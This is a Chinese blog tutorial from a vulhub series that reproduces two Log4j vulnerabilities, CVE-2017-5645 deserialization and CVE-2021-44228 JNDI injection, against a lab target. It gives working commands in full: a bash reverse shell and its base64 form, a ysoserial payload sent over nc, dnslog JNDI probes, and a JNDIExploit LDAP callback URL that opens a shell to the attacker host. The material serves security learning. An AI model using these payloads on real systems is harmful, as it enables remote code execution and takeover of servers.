(七)vulhub专栏:Log4j 反序列化、远程代码执行漏洞复现

已于 2022-07-25 15:30:47 修改
阅读量980 收藏 5
点赞数 2
分类专栏: vulhub漏洞复现 文章标签: log4j
于 2022-07-21 15:30:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014536801/article/details/125913490
版权

Log4j CVE-2017-5645反序列化漏洞

影响范围

Apache Log4j 2.x <= 2.8.2

漏洞成因

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之 前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

漏洞利用

环境准备
名称IP
攻击机192.168.75.162
靶机192.168.75.146

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8983即可

cd vulhub-master/log4j/CVE-2017-5645
docker-compose up -d

然后进入攻击机里使用nmap扫描全端口:

nmap -sS 192.168.75.146 -p 1-65535 -v

在这里插入图片描述

漏洞复现

首先准备好生成利用的工具:ysoserial.jar

工具验证漏洞是否存在

在这里插入图片描述

在这里插入图片描述

可以看出存在log4j漏洞

POC:

//反弹shell命令,注意替换为自己的
bash -i >& /dev/tcp/192.168.75.162/6666 0>&1
//base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=

接下来新打开一个cmd窗口执行以下命令:

nc -lvvp 6666

监听启动后我们使用payload:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" | nc 192.168.75.146 4712

访问上述地址后,可以看到如下图,反弹shell成功,此漏洞利用成功

在这里插入图片描述

Log4j CVE-2021-44228远程代码执行漏洞

影响范围

Apache Log4j 2.x <= 2.14.1

漏洞成因

Log4j2默认支持解析ldap/rmi协议,并会通过名称从ldap服务端其获取对应的Class文件,并使用ClassLoader在本地加载Ldap服务端返回的Class类。这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:9999/Test}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。

漏洞利用

环境准备
名称IP
攻击机192.168.75.162
靶机192.168.75.146

首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8983即可

cd vulhub-master/log4j/CVE-2021-44228
docker-compose up -d

image-20220721143339286

漏洞复现

首先准备好生成利用的工具:JNDIExploit-1.2-SNAPSHOT.jar

在利用漏洞之前,需要先判断目标是否出网,这里我们采用ceye来判断,也可以使用dnslog

POC:#记得修改xxx.dnslog.cn为自己的,下方二选一

${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
${jndi:rmi://${sys:java.version}.xxx.dnslog.cn}

然后访问链接:

http://192.168.75.146:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}

image-20220721145718365

接下来在ceye或dnslog端即可看见java版本信息了,如下图所示,若无信息返回,则代表不出网

image-20220721145902427

接下来我们通过准备好的利用工具,输入如下指令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.75.162

执行完上述命令会开启ldap和http服务,如下图所示:

image-20220721152200190

接下来新打开一个cmd窗口执行以下命令:

nc -lvvp 6666

监听启动后我们在浏览器输入:

http://192.168.75.146:8983/solr/admin/cores?action=${jndi:ldap://192.168.75.162:1389/Basic/ReverseShell/192.168.75.162/6666}

访问上述地址后,可以看到如下图,反弹shell成功,此漏洞利用成功

image-20220721152316739

云舒_YunShu
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
最新发布
2401_84545497的博客
05-13 946
我第一次复现的时候,直接用了JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar或JNDIExploit-1.4-SNAPSHOT.jar,可以在github上搜一下(后文会介绍),但我写博客的时候考虑到用这种工具感觉像是一键复现漏洞,对漏洞利用的每个步骤好像并不是很明确,所以我们还是先不用这种方法,还是老老实实自己编写一下恶意代码,启动一下恶意的http服务站点和LDAP服务,完整的演示一下过程。如果等保模块学的好,还可以从事等保工程师。
漏洞复现——Vulhup靶场-Log4j复现
qq_39289068的博客
05-06 241
log4j复现
利用Vulhub复现log4j漏洞
god_001的博客
04-27 4277
Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机: 首先进入log4j路径 cd vulhub/log4j/CVE-2021-44228/ 搭建环境 sudo docker-compose build sudo docker-compose up -d 网址输入:http://127.0.0.1:8983/admin/cores 在DNSlog网站生成域名:jkvl0r.dnslog.cn 输入http://127.0.0.1:8983/admin/cores?action
vulhubLog4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2748
vulhubLog4j2:CVE-2021-44228漏洞复现
追求代码质量:JUnit4与TestNG的对比
02-04
表面上的相似依赖性测试失败和重运行参数化测试高级参数化测试为什么只选择其一?JUnit4具有基于注释的新框架,它包含了TestNG一些最优异的特性。但这是否意味着JUnit4已经淘汰了TestNG?AndrewGlover探讨了这两种...
C++ Q&A 专栏:颜色支持...VC源代码
03-15
C++ Q&A 专栏...颜色支持,控制台应用,保存用户设置.... 关键字:color,Console,settings,getdevicecaps,ini,颜色,控制台,用户设置
C++ Q&A 专栏:用 VolInfo 获取逻辑驱动器VC源代码
03-15
C++ Q&A 专栏1、我试图写一个能列出系统上的驱动器(C:,D:等)的MFC程序,我也需要知道该驱动器是一个硬盘或是光驱。有这样的一个类来获得此信息吗?2、知道你是一位C#专家(同时也是一位C++专家),我有一个问题...
C++ QA 专栏:列表视图模式,SetForegroundWindow 及类保护VC源代码
03-15
我试图使用C++/MFC自定义文件打开对话框。是否有一种办法能在打开/保存对话框启动时改变列表视图的类型?启动时默认的是列表视图, 这个视图没什么用。我希望程序启动对话框时采用详细资料视图,或最好是用户最后一...
独孤木专栏:漫谈UMLOOADandRUP(下)
03-05
**使用者或者是客户的信息人员,看不懂相关的文件**开发项目到底会遇到什么样的客户?其实就像是跟网友见面差不多,还没有看到真人,你永远不知道哪个每天跟你聊天分享心事的超级美女,其实是一个中年男子。...
Struts2 CVE-2021-44228 log4j POC
不光要学,知识要能说出口
12-28 2810
随着log4j漏洞的出现,众多框架受到影响,大家都在研究不同框架的利用点在何处,下面总结的是Struts2目前的poc。
log4shell-vulnerable-app
m0_49025459的博客
12-06 389
使用JNDIExploit-1.2-SNAPSHOT在自己的vps上开启服务 抓包填写payload,获得flag 若有收获,就点个赞吧
vulhub-log4j漏洞复现
m0_62008601的博客
07-27 1242
vulhub-log4j漏洞复现
命令执行(RCE)与反序列化
赤赤三的博客
03-24 5847
命令执行(RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。): 分类: 远程系统命令执行exec()、system()、assert(): 设计者在编写代码时没有做严格的安全控制,导致攻击者通过接口或相关参数提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器 。 涉及系统命令:assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,``(反单引号) .
JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用
wutiangui的博客
09-07 1784
再开一个cmd可以看下能用什么payload。以上payload都可以尝试,我们使用。Windows攻击端执行以下命令。请求包中增加cmd:whoami。1.首先搭建log4j靶场。执行后发现命令可以执行
System类查看jdk版本,安装信息--Java
chenzitian6058的博客
02-01 153
@Test public void test2() { String javaVersion = System.getProperty("java.version"); System.out.println("java的version:" + javaVersion); String javaHome = System.getProperty("java.home"); System.out.println("java的home:"
使用JNDIExploit-1.2-SNAPSHOT.jar复现log4j2详细流程
m0_74196038的博客
03-19 1137
还有就是之所以这个实验做了两次,就是因为在这个实验当中,我第一次做的时候,由于这个复现是使用那个脚本,所以直接使用命令去开启http服务和ldap服务 ,但是我发现开启了http服务,但是没法访问到,我以为是环境的问题,就打算第二天再做。结果第二天还是不行,后来终于搞明白了,他这里使用工具开启http服务的指令,实际上并没有真正的开启http服务,只是做了一个端口监听,让靶机误以为开启了ldap服务和http服务。-i 指定开启服务的ip,也就是攻击者的ip,也可以是黑客的公网服务器。
Apache Log4j2代码执行漏洞复现(cve-2021-44228)
Bird&Bird
12-14 9547
目录一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详
Chaitin-Tech-Column-2018-246.-长亭技术专栏2018年度文集
07-18
《长亭技术专栏2018年度文集》 汇聚2018年长亭知乎技术专栏文章干货,作者主要为长亭科技技术人员。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值